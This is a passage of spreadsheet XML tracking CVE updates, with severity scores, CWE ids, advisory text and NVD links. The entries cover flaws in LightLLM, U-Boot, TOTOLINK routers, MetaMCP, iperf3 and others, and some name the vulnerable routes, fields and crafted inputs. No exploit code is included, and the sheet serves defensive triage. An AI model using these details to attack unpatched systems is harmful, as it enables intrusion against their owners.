      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 multimodal deployments expose an unauthenticated RPyC cache service with pickle deserialization enabled on all interfaces. Attackers can send crafted serialized objects to exposed cache methods to execute arbitrary code with service privileges.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103041</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101894</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S376"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376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101894</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102268</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>python, cryptography, go</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S377"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377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102268</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79536</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>bytebase dbhub v1.2.0 was discovered to contain a SQL injection vulnerability in the /utils/sql-parser.ts component. This vulnerability allows attackers to access sensitive databse information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79536</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79537</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>metatool-ai MetaMCP through 2.4.22 contains an insecure direct object reference (IDOR) in the MCP transport session dispatch. The session store (getSession in session-lifetime-manager.ts) is keyed only by the client-supplied mcp-session-id header with no owner, namespace, or endpoint binding, and the per-endpoint authorization middleware validates only the URL endpoint's owner, never the session. An attacker who supplies another tenant's session id " obtained without authentication from GET /metamcp/health/sessions, which discloses active session IDs and namespace UUIDs " can list and execute the victim tenant's private MCP tools and exfiltrate their data using the victim's forwarded credentials.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79537</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97689</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M380" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr"/>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S380"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380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97689</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67993</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>basecamp/upright at commit efe4f2e5254ac6e57e45d2261804cca74dbbca3f contains a login cross-site request forgery issue in the static credentials callback.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67993</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.8)</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71971</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc3 with CONFIG_IP_DEFRAG enabled contains an out-of-bounds write vulnerability in the __net_defragment() function in net/net.c. Remote attackers can send a crafted IP fragment with non-zero offset and More-Fragments flag set during netboot to corrupt adjacent memory and crash the bootloader.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71971</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.8)</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74220</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc5 contains a buffer overflow in nfs_read_reply() function in net/nfs-common.c that allows attackers to corrupt memory by supplying crafted NFS READ reply lengths. A malicious NFS server can exploit signed integer handling to bypass length validation and write far past the destination buffer, crashing the bootloader or corrupting memory.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74220</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.8)</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74221</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc5 contains a buffer overflow in nfs_readlink_reply() function in net/nfs-common.c when processing NFS server responses. A malicious NFS server can send crafted READLINK replies with negative or oversized symlink length values to corrupt memory and crash the bootloader.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74221</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94953</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the web management interface of TOTOLINK N150RT (NTR150) firmware V3.4.0-B20201030. It is reachable through the route /boafrm/formAjaxSet using the topicurl=setting/setWiFiRepeaterConfig branch and the ApCliWEPKey field.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94953</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94954</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the web management interface of TOTOLINK N150RT (NTR150) firmware V3.4.0-B20201030. It is reachable through the route /boafrm/formFilter (access-control / URL filter configuration handler) and is triggered by the url request parameter when the addFilterUrl (or addFilterUrlFlag) action flag is set.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94954</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95362</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>Cross-site request forgery in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95362</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100700</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S388"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388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100700</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102253</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>iperf3 versions prior to 3.22 contains a denial of service vulnerability that allows unauthenticated remote attackers to crash-loop the server's UDP receive worker into an unrecoverable infinite loop by sending a single crafted control-channel parameter message followed by one 16-byte UDP datagram. Attackers can permanently pin the affected per-stream receive thread at approximately 100% CPU usage, rendering the server unusable until forcibly killed with SIGKILL, as the process does not respond to normal control-channel closure.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102253</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103043</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr">
        <is>
          <t>node.js, express, requests, gin</t>
        </is>
      </c>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S390"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390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103043</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 8.7)</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61519</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr">
        <is>
          <t>vite</t>
        </is>
      </c>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S391"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391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61519</t>
        </is>
      </c>
    </row>
